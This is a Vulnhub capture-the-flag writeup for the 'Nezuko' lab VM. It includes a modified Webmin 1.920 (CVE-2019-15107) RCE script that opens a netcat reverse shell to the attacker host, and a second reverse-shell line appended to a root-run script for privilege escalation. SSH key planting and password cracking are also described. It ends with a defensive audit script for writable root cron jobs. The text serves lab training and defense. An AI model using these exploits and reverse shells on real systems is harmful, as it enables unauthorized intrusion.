Vulnhub - Nezuko writeup
Author: nezuko kamado
Let’s start our enumeration with the HTTP services.
HTTP (port 80)
If we visit the website we can see a simple message with a gif.
I ran gobuster on the website and found a few extra pages.
In robots.txt there was a base32 encoded string.
I decoded it and got a message:
hint from nezuko : this is not the right port to enumerate ^w^
But I still continued to look in the other dirs I found.
I visited the /sample/ dir, which had a file named
And there was literally nothing there 😄😄
Since I didn’t find anything on this port, I decided to check out port
HTTP (port 13337)
I tried visiting this port via browser but the request kept timing out. For some reason I was not able to open this port. But we know that there is a Webmin server running with version 1.920, so I decided to look for some kind of exploit.
With a simple Google search I found Webmin 1.920 - Remote Code Execution.
I ran the script and got
Now if we look at the code properly, it’s running an echo command and then telling us whether it’s vulnerable or not.
-d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel'
If we can replace this echo command with reverse shell code, that will give us a shell.
After making the changes our code would look like:
#!/bin/sh
URI=$1;
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -X POST -ks $URI'/password_change.cgi' \
  -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/sh 192.168.56.1 1337 &new1=wheel&new2=wheel' \
  -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H 'Referer: '$URI'/session_login.cgi'
if [ $? -eq 0 ]; then
  echo '\033[0;31mVULNERABLE!\033[0m'
else
  echo '\033[0;32mOK! (target is not vulnerable) \033[0m'
fi
#EOF
I ran this script while my listener was listening and I got a shell.
I got the nezuko.txt in the
Horizontal Privilege Escalation
First of all, this is a very shitty shell that we have right now. I tried to spawn a tty shell but for some reason couldn’t.
I noticed that in /home/nezuko there is a .ssh folder but the id_rsa was empty. We can just place our own authorized_keys and then log in.
Once I did that I was able to log in via SSH.
Now we have a good shell for further enumeration. I downloaded and ran
I found a list of users but there was something weird with one user.
We can see the password hash for
I saved the hash to a file and used john to crack the password. I got the result within minutes.
Now we can change our user from
Vertical privilege escalation
In /home/zenitsu I found
In that directory I found another dir named to_nezuko, which had a shell script named
If we look at /home/nezuko/from_zenitsu/ we’ll find a lot of messages, but all of them had root permissions, meaning this script is running with root privileges.
If we look at the perms of the shell file we can see that user zenitsu has the right to edit this file.
This means we can just put reverse shell code in that file and wait for this script to run.
echo "nc -e /bin/sh 192.168.56.1 4444" >> send_message_to_nezuko.sh
Now run your listener with nc -nlvp 4444 and wait for the root shell to pop up.
After a minute or so I got the reverse shell.
And then I got the root flag.
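The condition that made this step work is a root-run script that a non-root user can edit. As an added example (not part of the original writeup), here is a POSIX shell audit that reports such files. It assumes the script is started from an /etc/crontab-style file, which the writeup does not confirm; the function names and the trusted-UID parameter are hypothetical.

```sh
#!/bin/sh
# Added example: list scripts run by root cron entries that a non-root user
# could modify. Assumed input is system-crontab format:
#   min hour dom mon dow user command...
# Usage (file name is an assumption): sh audit_root_cron.sh /etc/crontab
set -f   # no globbing: cron lines contain '*'

# is_unsafe PATH [TRUSTED_UID]: succeeds when PATH is owned by someone other
# than TRUSTED_UID (default 0, root) or is group- or world-writable.
is_unsafe() {
    path=$1; trusted=${2:-0}
    [ -e "$path" ] || return 1
    set -- $(ls -ldn -- "$path")     # $1 = mode string, $3 = numeric owner
    mode=$1; owner=$3
    [ "$owner" != "$trusted" ] && return 0
    case $mode in
        ?????w*|????????w*) return 0 ;;   # char 6 = group w, char 9 = other w
    esac
    return 1
}

# audit_root_cron CRONTAB [TRUSTED_UID]: for every absolute path named in a
# root entry, print "UNSAFE <path>" if the file or its directory is unsafe.
# A writable directory lets the file be replaced even if the file is locked.
audit_root_cron() {
    crontab=$1; uid=${2:-0}
    while read -r min hour dom mon dow user cmd; do
        case $min in ''|'#'*|*=*) continue ;; esac   # blank, comment, VAR=value
        [ "$user" = root ] || continue
        for word in $cmd; do
            case $word in /*) ;; *) continue ;; esac
            for target in "$word" "$(dirname "$word")"; do
                if is_unsafe "$target" "$uid"; then
                    echo "UNSAFE $target"
                fi
            done
        done
    done < "$crontab"
}

if [ "$#" -gt 0 ]; then audit_root_cron "$@"; fi
```

The fix for anything it reports is to make the script and its directory owned by root and not writable by group or others.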
This is a pretty good machine. The thing I liked about this VM was that nothing is hard and nothing is easy in it.
Thanks to @yunaranyancat for making such a good VM.
Thanks for reading, Feedback is always appreciated.
Follow me @0xmzfr for more “Writeups”.